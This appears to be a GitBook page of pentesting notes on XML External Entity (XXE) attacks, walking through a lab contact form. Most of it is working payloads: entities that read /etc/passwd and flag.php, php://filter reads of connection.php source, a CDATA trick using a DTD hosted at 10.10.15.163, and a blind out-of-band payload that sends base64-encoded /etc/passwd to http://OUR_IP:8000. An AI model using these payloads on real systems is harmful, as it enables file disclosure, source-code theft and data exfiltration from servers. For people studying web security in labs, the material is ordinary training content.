# XML External Entity (XXE)

## Basic XXE Payloads

```python
#Simple File read
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>

#php filters
<!DOCTYPE email [<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php">]>


```

## Basic XXE Testing&#x20;

In the below image i can see that my email is getting reflected back to me, so i will test for XXE in that parameter

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2Fjqp841xmnGmSyDfyuMDd%2Fimage.png?alt=media&#x26;token=d3c98947-2e1a-49f0-8cbf-eb856b8ca95f" alt=""><figcaption></figcaption></figure>

now i will test for Basic XXE

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>	
<root>
<name>test</name>
<tel>1122112211</tel>
<email>&test;</email>
<message>sadadasdasdasd</message>
</root>
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2Fp2kK8LST5pCdVrE0gsGh%2Fimage.png?alt=media&#x26;token=f9c18830-7268-4be1-af36-b3350060664a" alt=""><figcaption></figcaption></figure>

## XXE PHP Filters to Read Source Code

We can now try to read the source code using php filters, i will try to read **connection.php** file

```
<!DOCTYPE email [<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php">]>
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2F0RquYmjk2Gfs4ruhcEMz%2Fimage.png?alt=media&#x26;token=8f965b61-6fb3-4aa1-82f6-12a340b62bee" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FSF2ZwOB9aPTZiJnrStlJ%2Fimage.png?alt=media&#x26;token=52ff74a1-1051-400a-ac53-926f745353e2" alt=""><figcaption></figcaption></figure>

## Advanced File Disclosure (XXE CDATA)

if the web app is not build in php then php filters cannot help us, for this we can use CDATA and read any sort of file including binary data as well.

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FxPyd5yzPX85d31DFqZ7F%2Fimage.png?alt=media&#x26;token=a3a80f84-d256-4b8a-ba8c-aa02716d9756" alt=""><figcaption></figcaption></figure>

**This will not work,** because we cannot join internal and external entities in XML like this, so we need to find out another way

so i will host an DTD on my Python server

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2F0ALI7jeCtXt9K60HtF5e%2Fimage.png?alt=media&#x26;token=f5ea3219-f1f1-4571-88ab-aaaa892b72d4" alt=""><figcaption></figcaption></figure>

now this will get the DTD from my python server.

```xml
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:///flag.php"> <!-- reference external file -->
  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://10.10.15.163/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FjqIZXLpZNS9MSp8w5spq%2Fimage.png?alt=media&#x26;token=038a479d-eb86-4ba1-beaa-94a4a2a0f398" alt=""><figcaption></figcaption></figure>

now I can read the files as well.

## Blind XXE (Out of Band Data Exfiltration)

Sometimes you don't get a response from the website so you need to redirect the response to your own python server

```python
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>
```

We need to host the xxe.dtd on our python server&#x20;

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FVmAYhtFSt05wtAEg9gfy%2Fimage.png?alt=media&#x26;token=31e181ef-a728-4499-9b5f-7fc305fc1be9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FrC12rzbjRdbismIc50HZ%2Fimage.png?alt=media&#x26;token=24880fb3-fd0a-4dca-b743-ffedff89f3df" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FhdSencSxziIPpyZnS1zn%2Fimage.png?alt=media&#x26;token=4bd7991c-7737-4be1-a772-c0577b54cbc4" alt=""><figcaption></figcaption></figure>